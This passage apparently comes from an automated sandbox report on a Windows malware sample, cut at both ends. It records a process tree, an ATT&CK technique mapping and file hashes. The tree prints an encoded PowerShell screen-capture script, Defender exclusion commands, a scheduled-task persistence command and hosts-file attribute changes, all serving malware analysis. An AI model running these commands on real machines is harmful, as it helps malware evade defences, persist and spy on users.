gACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
5⤵
PID:2240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
6⤵
- Command and Scripting Interpreter: PowerShell
PID:5392

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nwni5eaa\nwni5eaa.cmdline"
7⤵
PID:4964

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA5D5.tmp" "c:\Users\Admin\AppData\Local\Temp\nwni5eaa\CSC20A657C94A7C40729993FDDBDD6C1CF2.TMP"
8⤵
PID:6304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
5⤵
PID:6168

C:\Windows\system32\tree.com
tree /A /F
6⤵
PID:7020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:6500

C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
6⤵
- Views/modifies file attributes
PID:6152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
5⤵
PID:6124

C:\Windows\system32\tree.com
tree /A /F
6⤵
PID:6524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:6908

C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
6⤵
- Views/modifies file attributes
PID:3592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
5⤵
PID:4060

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
6⤵
- Enumerates processes with tasklist
PID:6836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
5⤵
PID:5176

C:\Windows\system32\tree.com
tree /A /F
6⤵
PID:5356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
5⤵
PID:384

C:\Windows\system32\tree.com
tree /A /F
6⤵
PID:2380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
5⤵
PID:5600

C:\Windows\system32\tree.com
tree /A /F
6⤵
PID:2252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
5⤵
PID:1528

C:\Windows\system32\getmac.exe
getmac
6⤵
PID:3040

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3336

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows Service Wrapper.exe'
3⤵
PID:5908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Service Wrapper.exe'
3⤵
PID:6164

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Windows Service Wrapper.exe'
3⤵
PID:7792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Service Wrapper.exe'
3⤵
PID:7748

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Service Wrapper" /tr "C:\Users\Public\Windows Service Wrapper.exe"
3⤵
- Creates scheduled task(s)
PID:5704

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 580 -p 1612 -ip 1612
1⤵
PID:3364

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 512 -p 5244 -ip 5244
1⤵
PID:1016

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
PID:1824

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff954353cb8,0x7ff954353cc8,0x7ff954353cd8
2⤵
PID:1364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1840,7220249636468267216,8503025993703306268,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1800 /prefetch:2
2⤵
PID:3040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1840,7220249636468267216,8503025993703306268,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
2⤵
PID:6536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1840,7220249636468267216,8503025993703306268,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8
2⤵
PID:2084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,7220249636468267216,8503025993703306268,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
2⤵
PID:5408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,7220249636468267216,8503025993703306268,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
2⤵
PID:2240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,7220249636468267216,8503025993703306268,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4564 /prefetch:1
2⤵
PID:6428

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,7220249636468267216,8503025993703306268,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1
2⤵
PID:7260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1840,7220249636468267216,8503025993703306268,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3404 /prefetch:8
2⤵
PID:2012

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1840,7220249636468267216,8503025993703306268,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:8
2⤵
PID:7876

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,7220249636468267216,8503025993703306268,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
2⤵
PID:3188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,7220249636468267216,8503025993703306268,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1
2⤵
PID:8124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,7220249636468267216,8503025993703306268,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
2⤵
PID:1744

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,7220249636468267216,8503025993703306268,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
2⤵
PID:5344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,7220249636468267216,8503025993703306268,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
2⤵
PID:7108

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,7220249636468267216,8503025993703306268,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:1
2⤵
PID:2068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,7220249636468267216,8503025993703306268,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6536 /prefetch:1
2⤵
PID:6308

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3648

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4860

C:\Users\Public\Windows Service Wrapper.exe
"C:\Users\Public\Windows Service Wrapper.exe"
1⤵
PID:6036

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
c1c7e2f451eb3836d23007799bc21d5f

SHA1
11a25f6055210aa7f99d77346b0d4f1dc123ce79

SHA256
429a870d582c77c8a661c8cc3f4afa424ed5faf64ce722f51a6a74f66b21c800

SHA512
2ca40bbbe76488dff4b10cca78a81ecf2e97d75cd65f301da4414d93e08e33f231171d455b0dbf012b2d4735428e835bf3631f678f0ab203383e315da2d23a34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
6876cbd342d4d6b236f44f52c50f780f

SHA1
a215cf6a499bfb67a3266d211844ec4c82128d83

SHA256
ca5a6320d94ee74db11e55893a42a52c56c8f067cba35594d507b593d993451e

SHA512
dff3675753b6b733ffa2da73d28a250a52ab29620935960673d77fe2f90d37a273c8c6afdf87db959bdb49f31b69b41f7aa4febac5bbdd43a9706a4dd9705039

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
192B

MD5
729b3cf1f21d37c617b43f7ed957b324

SHA1
2eff9c2843657040c4a0a7aa79d467717df5e568

SHA256
b8279ba8f5c6502bfeee8bad5892c854997958778c06125c78c39e7760881ba1

SHA512
2acfa626ea9246efe076c1201b17028ffbc75ba10ba2b32e5df0bfba584fa68e5d5e77af0825083ef0688ce631fb262e804fc5d39bed116c54803d9b7db14317

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
111B

MD5
807419ca9a4734feaf8d8563a003b048

SHA1
a723c7d60a65886ffa068711f1e900ccc85922a6

SHA256
aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631

SHA512
f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
fd32350c04f97339c868960bc968ea5d

SHA1
7c53571f316953e1135c85478df72f856879482b

SHA256
e0eb046acadc8949109fea49536e278ead4c4dd787d891a16c07783ccac8c0de

SHA512
2efacc2c2a6fa03bc8e1e5df2d0a2211162505a29805d78a6534a6ebad41c58725e0081f992e50e6b8db7e19b1d29aa091424a24d355be683ec1ef1b352ae42b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
0a66b6d26541dc6bbdbaf79f42db0f27

SHA1
4ce867e1660b1e581d9c7881411d853852816872

SHA256
8a50a79bfa7aeeb8263c900f32b90dc923cd12e40d0215933ba5353e81f4358b

SHA512
ee506a3e139d38db1c300c7c6600d9017df69a1a8617bb3338776f8d9386f501c2217d77def5c6300ce36f12c751cf26fb3c2b29b8794a165796bb850f2d730f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
fb27563e2b8cce0e4de905d141b51073

SHA1
8f81f1f4d47fccbc7ac4186ac9f366bfa31418e1

SHA256
d92a5af625dce9ae27029329e46d02a20275c4aae02e0471669a3214c66b0d6f

SHA512
2129a7f3c22142a4d227f0a651d0b0f552d2ed21611f112a4dcdc16a201ac6db6502048b29dab87eadec8ca67d5409af43b46beb4382d3431043608e2b6d39db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
538B

MD5
e49be3b0e3904c87a7a268caf2052585

SHA1
2afe3f9e5a55854802afe7eb26ece4d0a56f9aae

SHA256
21c679beedb9f014ee562f4d81391c33f0faa5cf1dcb86e91fa40163da425d18

SHA512
656ea766687a960f4fda1774ea9aa611886e61326c2e91d242f3ce78092f7c8f78d331c6dfbff7f2ff8b56e82bc6863874cbd4b12bee9c0a4b3c0d392984095d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe596c7c.TMP
Filesize
538B

MD5
2fa522658b2e7b14b5f69e3243d33fdf

SHA1
ad1bd3ee62ef10d8895f8427b93b09d22f348c00

SHA256
0afe683c20708aa44c20d3d714873e70368b5e623d8221450f56b1fc68b66311

SHA512
4ae4a5741388da40798cb64df6e442d2c94e2ac7bd4df2bfb3067dc9af55960acc30970aee69a845090ca804f6ecd7d04353414892e04bd4e29f7cf0b28927e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
35a9c3f3ed4d147adca352418f92a54d

SHA1
7f898ce6ad53542ee533e0c60fc4f03a022fedf7

SHA256
48ed8efff145f99733069ca133684079114b3b83436c5e33cf8e0df561b5149b

SHA512
eb1dbd19434bf18b88cda9a69b09c55017160af35b5d6aa4a9eaf616a18859cad5d43a3f688bb121988c31c0a62279aa144e6002ebeaab603763437eeb76e1d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
571a1d709535170432ece6d2c3c77614

SHA1
42d30a039f460ff0c563a668d3120efe01bd6d63

SHA256
4c08af9f8adafa7b1dfa26a90e7aa99ee4bc744a2a63d6cfa89d4a89f4f32772

SHA512
c594a23df3d0f487e56561aace199a479afcae68442e74902d859d88a0f5c735925e1d9efb52d0b38df37e4411305e14b921ebfbc209b6f41221bb863a99b21b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
0b7e6c278bc7bb546a5b52b023e31f70

SHA1
588a31b4b00008eb81fd39c2bd4cea6264fd6b5f

SHA256
54c01162efdeb3b9ec67876e0b58960a9e091ab67a8bd506f82065584e3b955d

SHA512
cb7c7e02b254bcfd6b7b63e4b5114a460dfd64a463fc880171f08c48402235d7c2db94d288e2c5c032988aa34c2457d63e7ab5c5b3878846bc3d12673c0ce609

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
60KB

MD5
0320e4003b01f1fd769039b207190374

SHA1
865f1383f149cd11f920c4f9949ffe3689047875

SHA256
